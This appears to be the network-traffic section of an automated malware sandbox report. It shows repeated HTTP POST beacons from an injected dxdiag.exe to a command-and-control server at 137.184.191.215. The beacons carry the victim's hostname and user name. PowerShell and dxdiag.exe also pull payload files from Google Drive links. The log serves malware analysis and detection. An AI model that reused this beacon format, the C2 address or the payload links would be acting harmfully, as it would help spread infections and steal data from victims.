                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:48:12.018691063 CEST | 1236 | IN | Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:12.018702030 CEST | 366 | IN | Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        25 | 192.168.2.5 | 49741 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:48:12.168895006 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:48:12.173913002 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:14.774228096 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:48:12 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:48:14.774250031 CEST | 1236 | IN | Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:14.774265051 CEST | 366 | IN | Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        26 | 192.168.2.5 | 49742 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:48:14.934040070 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:48:14.938920975 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:17.521382093 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:48:15 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:48:17.521401882 CEST | 1236 | IN | Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:17.521411896 CEST | 366 | IN | Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        27 | 192.168.2.5 | 49743 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:48:17.671335936 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:48:17.676414967 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:20.266655922 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:48:18 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:48:20.266674042 CEST | 1236 | IN | Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:20.266685963 CEST | 366 | IN | Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        28 | 192.168.2.5 | 49744 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:48:20.417524099 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:48:20.422456026 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:23.061018944 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:48:20 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:48:23.061048985 CEST | 1236 | IN | Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:23.061062098 CEST | 366 | IN | Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        29 | 192.168.2.5 | 49745 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:48:23.212361097 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:48:23.217240095 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:25.861857891 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:48:23 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:48:25.861875057 CEST | 1236 | IN | Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:25.861886978 CEST | 366 | IN | Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.5 | 49704 | 142.250.184.238 | 443 | 3032 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-10-01 05:46:24 UTC | 215 | OUT | GET /uc?export=download&id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8 HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: drive.google.com
                        Connection: Keep-Alive
                        2024-10-01 05:46:25 UTC | 1610 | IN | HTTP/1.1 303 See Other
                        Content-Type: application/binary
                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                        Pragma: no-cache
                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                        Date: Tue, 01 Oct 2024 05:46:25 GMT
                        Location: https://drive.usercontent.google.com/download?id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8&export=download
                        Strict-Transport-Security: max-age=31536000
                        Cross-Origin-Opener-Policy: same-origin
                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                        Content-Security-Policy: script-src 'nonce-oeymWnFJsxqaNq4m_CHf_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                        Server: ESF
                        Content-Length: 0
                        X-XSS-Protection: 0
                        X-Frame-Options: SAMEORIGIN
                        X-Content-Type-Options: nosniff
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.5 | 49705 | 142.250.184.193 | 443 | 3032 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-10-01 05:46:25 UTC | 233 | OUT | GET /download?id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8&export=download HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: drive.usercontent.google.com
                        Connection: Keep-Alive
                        2024-10-01 05:46:28 UTC | 4858 | IN | HTTP/1.1 200 OK
                        Content-Type: application/octet-stream
                        Content-Security-Policy: sandbox
                        Content-Security-Policy: default-src 'none'
                        Content-Security-Policy: frame-ancestors 'none'
                        X-Content-Security-Policy: sandbox
                        Cross-Origin-Opener-Policy: same-origin
                        Cross-Origin-Embedder-Policy: require-corp
                        Cross-Origin-Resource-Policy: same-site
                        X-Content-Type-Options: nosniff
                        Content-Disposition: attachment; filename="Encephaloscope.fla"
                        Access-Control-Allow-Origin: *
                        Access-Control-Allow-Credentials: false
                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                        Accept-Ranges: bytes
                        Content-Length: 453852
                        Last-Modified: Mon, 30 Sep 2024 07:14:32 GMT
                        X-GUploader-UploadID: AD-8ljseGJFwgkAEuMqXVJQf8tNheOjD30K7styudwwJ6_Qe9l1JzwcmTlS2ITHyTBU_80dJQUD_6VYGbA
                        Date: Tue, 01 Oct 2024 05:46:28 GMT
                        Expires: Tue, 01 Oct 2024 05:46:28 GMT
                        Cache-Control: private, max-age=0
                        X-Goog-Hash: crc32c=7+s5hA==
                        Server: UploadServer
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        2 | 192.168.2.5 | 49713 | 142.250.184.238 | 443 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-10-01 05:46:57 UTC | 216 | OUT | GET /uc?export=download&id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: drive.google.com
                        Cache-Control: no-cache
                        2024-10-01 05:46:57 UTC | 1610 | IN | HTTP/1.1 303 See Other
                        Content-Type: application/binary
                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                        Pragma: no-cache
                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                        Date: Tue, 01 Oct 2024 05:46:57 GMT
                        Location: https://drive.usercontent.google.com/download?id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I&export=download
                        Strict-Transport-Security: max-age=31536000
                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                        Content-Security-Policy: script-src 'nonce-3LK2W62laBpdayf49mMN_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                        Cross-Origin-Opener-Policy: same-origin
                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                        Server: ESF
                        Content-Length: 0
                        X-XSS-Protection: 0
                        X-Frame-Options: SAMEORIGIN
                        X-Content-Type-Options: nosniff
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        3 | 192.168.2.5 | 49714 | 142.250.184.193 | 443 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-10-01 05:46:58 UTC | 258 | OUT | GET /download?id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I&export=download HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Cache-Control: no-cache
                        Host: drive.usercontent.google.com
                        Connection: Keep-Alive
                        2024-10-01 05:47:00 UTC | 4867 | IN | HTTP/1.1 200 OK
                        Content-Type: application/octet-stream
                        Content-Security-Policy: sandbox
                        Content-Security-Policy: default-src 'none'
                        Content-Security-Policy: frame-ancestors 'none'
                        X-Content-Security-Policy: sandbox
                        Cross-Origin-Opener-Policy: same-origin
                        Cross-Origin-Embedder-Policy: require-corp
                        Cross-Origin-Resource-Policy: same-site
                        X-Content-Type-Options: nosniff
                        Content-Disposition: attachment; filename="GUejPyvuYOfIqzabdUbw190.bin"
                        Access-Control-Allow-Origin: *
                        Access-Control-Allow-Credentials: false
